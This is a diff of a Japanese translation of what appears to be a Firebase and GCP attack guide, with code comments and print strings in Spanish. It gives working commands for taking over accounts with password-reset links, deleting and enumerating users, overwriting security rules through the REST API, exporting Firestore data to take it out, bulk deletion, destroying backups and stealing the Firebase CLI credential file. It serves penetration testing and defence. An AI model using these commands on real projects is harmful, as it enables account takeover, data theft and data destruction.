-print(f'Usuario creado: {user.uid}')
-```
-既存のユーザーを変更する場合、攻撃者はメールアドレス、検証ステータス、またはアカウントが無効化されているかどうかといったフィールドを変更します。
-```bash
-user = auth.update_user(
-uid,
-email='nuevo-email@example.com',
-email_verified=True,
-disabled=False
-)
-print(f'Usuario actualizado: {user.uid}')
-```
-ユーザーアカウントを削除することで — 実質的に denial of service を引き起こすことになり — 攻撃者はそのユーザーを永久に削除するリクエストを発行します。
-```bash
-auth.delete_user(uid)
-print('Usuario eliminado exitosamente')
-```
-攻撃者は、UID や email など既存ユーザの情報を、UID または email アドレスでユーザ詳細を要求して取得することもできます。
-```bash
-user = auth.get_user(uid)
-print(f'Información del usuario: {user.uid}, {user.email}')
-user = auth.get_user_by_email('usuario@example.com')
-print(f'Información del usuario: {user.uid}, {user.email}')
-```
-さらに、攻撃者は verification links or password-reset links を生成でき、ユーザーのパスワードを変更してアカウントを乗っ取ることができます。
-```bash
-link = auth.generate_email_verification_link(email)
-print(f'Link de verificación: {link}')
-link = auth.generate_password_reset_link(email)
-print(f'Link de reset: {link}')
-```
-### Firebase サービスにおけるセキュリティルールの変更
-攻撃者は、サービスによってセキュリティルールを変更するために特定の権限が必要です。Cloud Firestore と Firebase Cloud Storage の場合、必要な権限はルールセットを作成するための `firebaserules.rulesets.create` と、リリースをデプロイするための `firebaserules.releases.create` です。これらの権限は `roles/firebaserules.admin` ロール、または `roles/firebase.developAdmin` や `roles/firebase.admin` のような上位ロールに含まれます。Firebase Realtime Database の場合、必要な権限は `firebasedatabase.instances.update` です。
-
-攻撃者はセキュリティルールを変更するために Firebase REST API を使用する必要があります。まず、攻撃者はサービスアカウントの資格情報を使用してアクセストークンを取得する必要があります。
-トークンを取得するには:
+攻撃者はセキュリティルールを変更するために Firebase REST API を使用する必要がある。
+まず、攻撃者は service account credentials を使用して access token を取得する必要がある。
+トークンを取得するには：
 ```bash
 gcloud auth activate-service-account --key-file=path/to/serviceAccountKey.json
 ACCESS_TOKEN=$(gcloud auth print-access-token)
 ```
-Firebase Realtime Database のルールを変更するには:
+Firebase Realtime Database のルールを変更するには：
 ```bash
 curl -X PUT "https://<project-id>-default-rtdb.firebaseio.com/.settings/rules.json?access_token=$ACCESS_TOKEN" \
 -H "Content-Type: application/json" \
@@ -317,7 +318,7 @@ curl -X PUT "https://<project-id>-default-rtdb.firebaseio.com/.settings/rules.js
 }
 }'
 ```
-Cloud Firestore ルールを変更するには、攻撃者は ruleset を作成してからデプロイする必要があります:
+Cloud Firestore rules を変更するには、攻撃者は ruleset を作成してからそれを deploy する必要があります：
 ```bash
 curl -X POST "https://firebaserules.googleapis.com/v1/projects/<project-id>/rulesets" \
 -H "Authorization: Bearer $ACCESS_TOKEN" \
@@ -331,7 +332,7 @@ curl -X POST "https://firebaserules.googleapis.com/v1/projects/<project-id>/rule
 }
 }'
 ```
-前のコマンドは projects/<project-id>/rulesets/<ruleset-id> の形式で ruleset 名を返します。新しいバージョンをデプロイするには、release を PATCH リクエストで更新する必要があります:
+前のコマンドは projects/<project-id>/rulesets/<ruleset-id> の形式で ruleset 名を返します。新しいバージョンをデプロイするには、PATCH リクエストを使用してリリースを更新する必要があります:
 ```bash
 curl -X PATCH "https://firebaserules.googleapis.com/v1/projects/<project-id>/releases/cloud.firestore" \
 -H "Authorization: Bearer $ACCESS_TOKEN" \
@@ -357,7 +358,7 @@ curl -X POST "https://firebaserules.googleapis.com/v1/projects/<project-id>/rule
 }
 }'
 ```
-前のコマンドは projects/<project-id>/rulesets/<ruleset-id> の形式で ruleset 名を返します。新しいバージョンをデプロイするには、リリースを PATCH request を使用して更新する必要があります:
+前のコマンドは projects/<project-id>/rulesets/<ruleset-id> の形式で ruleset 名を返します。新しいバージョンをデプロイするには、リリースを PATCH リクエストで更新する必要があります:
 ```bash
 curl -X PATCH "https://firebaserules.googleapis.com/v1/projects/<project-id>/releases/firebase.storage/<bucket-id>" \
 -H "Authorization: Bearer $ACCESS_TOKEN" \
@@ -370,16 +371,16 @@ curl -X PATCH "https://firebaserules.googleapis.com/v1/projects/<project-id>/rel
 }'
 ```
 ### Cloud Firestore におけるデータの持ち出しと改ざん
-Cloud Firestore は Cloud Datastore と同じインフラおよび権限システムを使用するため、Datastore IAM の権限は Firestore にそのまま適用されます。TTL ポリシーを操作するには、`datastore.indexes.update` 権限が必要です。データをエクスポートするには、`datastore.databases.export` 権限が必要です。データをインポートするには、datastore.databases.import 権限が必要です。大量のデータ削除を行うには、`datastore.databases.bulkDelete` 権限が必要です。
+Cloud Firestore は Cloud Datastore と同じインフラストラクチャと権限システムを使用するため、Datastore IAM の権限はそのまま Firestore に適用されます。TTL ポリシーを操作するには、`datastore.indexes.update` の権限が必要です。データをエクスポートするには、`datastore.databases.export` の権限が必要です。データをインポートするには、datastore.databases.import の権限が必要です。大量のデータ削除を行うには、`datastore.databases.bulkDelete` の権限が必要です。
 
-バックアップおよび復元操作には、以下の特定の権限が必要です:
+バックアップとリストア操作には、以下の特定の権限が必要です：
 
-- `datastore.backups.get` と `datastore.backups.list` — 利用可能なバックアップの一覧表示および詳細取得用
+- `datastore.backups.get` と `datastore.backups.list` — 利用可能なバックアップの一覧取得と詳細取得のため
 - `datastore.backups.delete` — バックアップを削除するため
 - `datastore.backups.restoreDatabase` — バックアップからデータベースを復元するため
-- `datastore.backupSchedules.create` と `datastore.backupSchedules.delete` — バックアップスケジュールを管理するため
+- `datastore.backupSchedules.create` と `datastore.backupSchedules.delete` — バックアップスケジュールの管理のため
 
-TTL ポリシーを作成すると、削除対象となるエンティティを識別するために指定プロパティが選択されます。この TTL プロパティは Date and time 型である必要があります。attacker は既存のプロパティを選ぶことも、後で追加する予定のプロパティを指定することもできます。フィールドの値が過去の日付であれば、そのドキュメントは即時削除の対象になります。attacker は gcloud CLI を使用して TTL ポリシーを操作できます。
+TTL ポリシーが作成されると、削除対象となるエンティティを識別するためのプロパティが指定されます。この TTL プロパティは Date and time 型でなければなりません。攻撃者は既存のプロパティを選択するか、後で追加する予定のプロパティを指定できます。フィールドの値が過去の日付であれば、そのドキュメントは即時削除の対象になります。攻撃者は gcloud CLI を使って TTL ポリシーを操作できます。
 ```bash
 # Enable TTL
 gcloud firestore fields ttls update expireAt \
@@ -390,7 +391,7 @@ gcloud firestore fields ttls update expireAt \
 --collection-group=users \
 --disable-ttl
 ```
-データをエクスポートして exfiltrate するために、the attacker は gcloud CLI を使用することができる。
+データをエクスポートして exfiltrate するには、攻撃者は gcloud CLI を使用できます。
 ```bash
 gcloud firestore export gs://<bucket-name> --project=<project-id> --async --database='(default)'
 ```
@@ -398,14 +399,15 @@ gcloud firestore export gs://<bucket-name> --project=<project-id> --async --data
 ```bash
 gcloud firestore import gs://<bucket-name>/<path> --project=<project-id> --async --database='(default)'
 ```
-大量のデータを削除してサービス拒否を引き起こすために、攻撃者は gcloud Firestore bulk-delete tool を使ってコレクション全体を削除することができる。
+大量のデータを削除して denial of service を引き起こすために、the attacker は gcloud Firestore bulk-delete tool を使用してコレクション全体を削除できる。
 ```bash
 gcloud firestore bulk-delete \
 --collection-ids=users,posts,messages \
 --database='(default)' \
 --project=<project-id>
 ```
-バックアップと復元の操作では、攻撃者は database の現在の状態をキャプチャするために scheduled backups を作成したり、既存の backups を一覧表示したり、restore によって最近の変更を上書きしたり、データを恒久的に失わせるために backups を削除したり、scheduled backups を削除したりできます。日次の backup スケジュールを作成し、直ちに backup を生成するには:
+バックアップと復元の操作では、攻撃者はデータベースの現在の状態を取得するためにスケジュールされた backups を作成したり、既存の backups を一覧表示したり、backup から restore して最近の変更を上書きしたり、backups を削除して恒久的なデータ損失を引き起こしたり、スケジュール済みの backups を削除したりできます。
+すぐに backup を生成する毎日の backup スケジュールを作成するには：
 ```bash
 gcloud firestore backups schedules create \
 --database='(default)' \
@@ -413,7 +415,7 @@ gcloud firestore backups schedules create \
 --retention=14w \
 --project=<project-id>
 ```
-特定のバックアップから復元するには、攻撃者はそのバックアップに含まれるデータを使って新しいデータベースを作成できます。復元操作はバックアップのデータを新しいデータベースに書き込むため、既存の DATABASE_ID を使用することはできません。
+特定のバックアップから復元するには、攻撃者はそのバックアップに含まれるデータを使って新しいデータベースを作成することができる。復元操作はバックアップのデータを新しいデータベースに書き込むため、既存のDATABASE_IDは使用できない。
 ```bash
 gcloud firestore databases restore \
 --source-backup=projects/<project-id>/locations/<location>/backups/<backup-id> \
@@ -426,16 +428,16 @@ gcloud firestore backups delete \
 --backup=<backup-id> \
 --project=<project-id>
 ```
-### Firebase CLI credentials の窃取と悪用
-攻撃者はこの攻撃を実行するのに特別なFirebase権限は不要ですが、開発者のローカルシステムまたはFirebase CLI credentials ファイルへのアクセスは必要です。これらの資格情報は、次の場所にあるJSONファイルに保存されています:
+### Firebase CLI の資格情報の窃取と悪用
+攻撃者はこの攻撃を実行するために特定の Firebase 権限を必要としませんが、開発者のローカルシステムまたは Firebase CLI の資格情報ファイルへのアクセスが必要です。これらの資格情報は次の場所にある JSON ファイルに格納されています:
 
 - Linux/macOS: ~/.config/configstore/firebase-tools.json
 
 - Windows: C:\Users\[User]\.config\configstore\firebase-tools.json
 
-このファイルには認証トークン（refresh_token と access_token を含む）が含まれており、攻撃者は元々 firebase login を実行したユーザーとして認証できます。
+このファイルには認証トークン（refresh_token や access_token を含む）が含まれており、攻撃者は firebase login を実行した元のユーザーとして認証できます。
 
-攻撃者がFirebase CLI credentialsファイルにアクセスすると、そのファイルを丸ごと自分の環境にコピーできます。Firebase CLIはデフォルトの場所から自動的にその資格情報を使用するため、その後攻撃者は当該ユーザーがアクセス可能なすべてのFirebase projectsを閲覧できます。
+攻撃者が Firebase CLI の資格情報ファイルにアクセスすると、そのファイルを自分のシステムにコピーして、Firebase CLI はデフォルトの場所から自動的に資格情報を使用します。これを行うと、攻撃者はそのユーザーがアクセス可能なすべての Firebase プロジェクトを表示できます。
 ```bash
 firebase projects:list
 ```